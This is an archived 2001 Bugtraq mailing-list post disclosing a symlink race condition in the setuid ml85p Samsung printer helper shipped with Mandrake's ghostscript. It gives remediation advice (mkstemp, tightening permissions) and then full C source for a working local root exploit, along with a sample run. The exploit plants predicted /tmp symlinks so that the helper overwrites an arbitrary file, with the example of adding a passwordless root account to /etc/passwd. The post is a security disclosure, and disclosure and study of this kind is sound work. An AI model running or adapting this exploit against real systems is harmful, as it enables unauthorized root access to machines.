Samsung ML-85G Printer Linux Helper/Driver Binary Exploit (Mandrake: ghostscript package)

• Previous message: Andrew J.Gavin: "Quake client and server denial-of-service"
• Next in thread: suidat_private: "Re: Samsung ML-85G Printer Linux Helper/Driver Binary Exploit (Mandrake: ghostscript package)"
• Reply: suidat_private: "Re: Samsung ML-85G Printer Linux Helper/Driver Binary Exploit (Mandrake: ghostscript package)"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

----- Forwarded message from Charles Stevenson <coreat_private> -----

From: Charles Stevenson <coreat_private>
To: Bugtraq <bugtraqat_private>, chmouelat_private
CC: Kevin Finisterre <dotslashat_private>
Subject: Samsung ML-85G Printer Linux Helper/Driver Binary Exploit (Mandrake: 
 ghostscript package)
Date: Tue, 10 Jul 2001 16:27:39 -0600
Message-ID: <3B4B815B.B1A65869at_private>

NOTE TO MODERATOR: PLEASE HOLD UNTIL 16 JULY 2001 TO ALLOW VENDOR TIME
TO RELEASE AN UPDATE

Author(s): Charles Stevenson, core at ezlink dot com
           Kevin Finisterre, dotslash at snosoft dot com

Date Published: 2001 JULY 16

Revision: 1.0

Advisory ID: N/A

Bugtraq ID: 3008

CVE CAN: Non currently assigned.

Title: ml85p Linux Helper Binary for Samsung ML-85G Printer Insecure
Temporary File Creation

Class: Insecure Temporary File Creation Race Condition

Remotely Exploitable: No

Locally Exploitable: Yes

Vulnerability Description:  

The Samsung ML-85G GDI printer driver (helper binary to me;) suffers
from insecure temporary file creation practices.  It is possible to
create files as root which can lead to root access.

Vulnerable Systems: 

This exploit should be specific to the x86 architecture although rare
cases may exist (the symlik attack is not plaform dependant).  All
systems running ml85p built from tarball are assumed to be vulnerable. 
ml85p is also distributed by MandrakeSoft in the ghostscript RPM.  The
permissions are more stringent and would require sys priveleges.  I
tested it on ml85p built from the tarball on my Debian system and Kevin
tested on his Mandrake system.

> [d0tslash@linux d0tslash]$ ls -al /usr/bin/ml85p
> -rwsr-x---    1 root     sys         11676 Mar 30 11:43 /usr/bin/ml85p*

Mandrake:

ghostscript-5.50-71mdk.i586.rpm
ghostscript-5.50-67mdk.i586.rpm
ghostscript-5.50-67mdk.i586.rpm

Solution/Vendor Information/Workaround: 

The author's site and the source code can be found at: 

http://members.nbci.com/rpragana/gdiprinters.html

Recommended fix... use mkstemp() instead of the homegrown code:

line 726:                       sprintf(gname,"/tmp/ml85g%d",time(0));

Quick fix... chmod 0755 `which ml85p`

Vendor notified on: 2001 JULY 10

Credits: 

The credit goes to my good friend Kevin Finisterre for discovering the
vulnerability, I (Charles Stevenson) wrote the proof-of-concept exploit.

This advisory was drafted with the help of the SecurityFocus.com
Vulnerability Help Team. For more information or assistance drafting 
advisories please mail vulnhelpat_private

Technical Description - Exploit/Concept Code: 

[-(core@devastator:~/bleedingedge)> ./ml85p-xpl /etc/rc.owned
owned::0:0:root:/root:/bin/bash
ml85p-xpl.c by core (c) 2001
> backing up /etc/rc.owned to /tmp/ez.n6ZT1m
/bin/cp: cannot stat `/etc/rc.owned': No such file or directory
/bin/touch: getting attributes of `/etc/rc.owned': No such file or
directory
> creating a lot of symlinks
Running a few times since I'm lazy.
Wrong file format.
file position: f
Wrong file format.
file position: f
Wrong file format.
file position: f
Wrong file format.
file position: f
Wrong file format.
file position: f
Wrong file format.
file position: f
Wrong file format.
file position: f
Wrong file format.
file position: f
Wrong file format.
file position: f
Wrong file format.
file position: f
-rw-rw-rw-    1 root     staff           0 Jul 10 13:14 /etc/rc.owned
-rw-rw-rw-    1 root     staff          32 Jul 10 13:14 /etc/rc.owned
owned::0:0:root:/root:/bin/bash
> cleaning up
Don't forget to `cp /tmp/ez.n6ZT1m /etc/rc.owned && touch -r
/tmp/ez.n6ZT1m /etc/rc.owned`!
All done. Enjoy!

You'll want to download this from my website or take care to reconstruct
the lines which got wrapped.

http://www.ezlink.com/~core/hot/ml85p-xpl.c

/* ml85p-xpl.c
 *
 * Quick hack to exploit ml85p
 *
 * Simply run it with the file you want to create/overwrite
 * and the data you wish to place in the file.
 *
 * Example:
 *
 * $ gcc -g -Wall ml85p-xpl.c -o ml85p-xpl
 * $ ./ml85p-xpl /etc/passwd owned::0:0:root:/root:/bin/bash
 *
 * Then login as owned... etc..
 *
 * by Charles Stevenson <coreat_private>
 *
 * July 10 2001
 *
 * exploit discovered by KF <dotslashat_private>
 *
 * shoutz b10z and word to Kevin for the quick tag team :)
 */

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

#include <time.h>

#define TEMPFILE "/tmp/ez.XXXXXX"
#define BRUTE 10

void usage(char*);

int main(int argc, char **argv){
   char tempfile[128] = TEMPFILE;
   int fd, i;
   time_t the_time;
   char temp[512];
   
   if (argc < 3){
      usage(argv[0]);
   }

   if((fd = mkstemp(tempfile))==-1){
      fprintf(stderr, "Error creating %s!\n",tempfile);
      exit(1);
   }

   /* begin lazy slacker coding */
   fprintf(stderr, "ml85p-xpl.c by core (c) 2001\n");
   fprintf(stderr, "> backing up %s to %s\n", argv[1], tempfile);

   /* backup old file */
   sprintf(temp, "/bin/cp %s %s", argv[1], tempfile);
   system(temp);
   
   /* set the date/time */
   sprintf(temp, "/bin/touch -r %s %s", argv[1], tempfile);
   system(temp);

   the_time = time(NULL);

   fprintf(stderr, "> creating a lot of symlinks\n");

   for (i=0;i<BRUTE;i++){
      sprintf(temp, "/tmp/ml85g%d", the_time+i);
      symlink(argv[1], temp);
   }
   
   sprintf(temp, \
     "echo \"b1nary 0utlawz\">file; umask 000 && ml85p -sf file\n", \
     argv[2]);
   fprintf(stderr, "Running a few times since I'm lazy.\n");
   for (i=0;i<BRUTE;i++){
      system(temp);
   }

   sprintf(temp, "/bin/ls -l %s", argv[1]);
   system(temp);

   sprintf(temp, "echo \"%s\" > %s", argv[2], argv[1]);
   system(temp);

   sprintf(temp, "/bin/ls -l %s", argv[1]);
   system(temp);

   sprintf(temp, "/bin/cat %s", argv[1]);
   system(temp);

   fprintf(stderr, "> cleaning up\n");
   sprintf(temp, "/bin/rm -f /tmp/ml85*");
   system(temp);

   fprintf(stderr, \
     "Don't forget to `cp %s %s && touch -r %s %s`!\n",tempfile,\
     argv[1], tempfile, argv[1]);
   
   fprintf(stderr, "All done. Enjoy!\n");
   return 0;
}

void usage(char *name){
   
   fprintf(stderr, "usage: %s <filename> <data>\n", name);
   exit(1);
}

/* EOF */

Disclaimer: 

The information within this paper may change without notice. Use of
this information constitutes acceptance for use in an as is condition.
There are no warranties with regard to this information. In no event
shall the author(s) be liable for any damages whatsoever arising out of
or in connection with the use or spread of this information. Any use of
this information is at the user's own risk.

----- End forwarded message -----

-- 
Elias Levy
SecurityFocus.com
http://www.securityfocus.com/
Si vis pacem, para bellum

• Next message: Aaron C. Newman: "RE: [COVERT-2001-04] Vulnerability in Oracle 8i TNS Listener"
• Previous message: Andrew J.Gavin: "Quake client and server denial-of-service"
• Next in thread: suidat_private: "Re: Samsung ML-85G Printer Linux Helper/Driver Binary Exploit (Mandrake: ghostscript package)"
• Reply: suidat_private: "Re: Samsung ML-85G Printer Linux Helper/Driver Binary Exploit (Mandrake: ghostscript package)"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Mon Jul 16 2001 - 22:49:31 PDT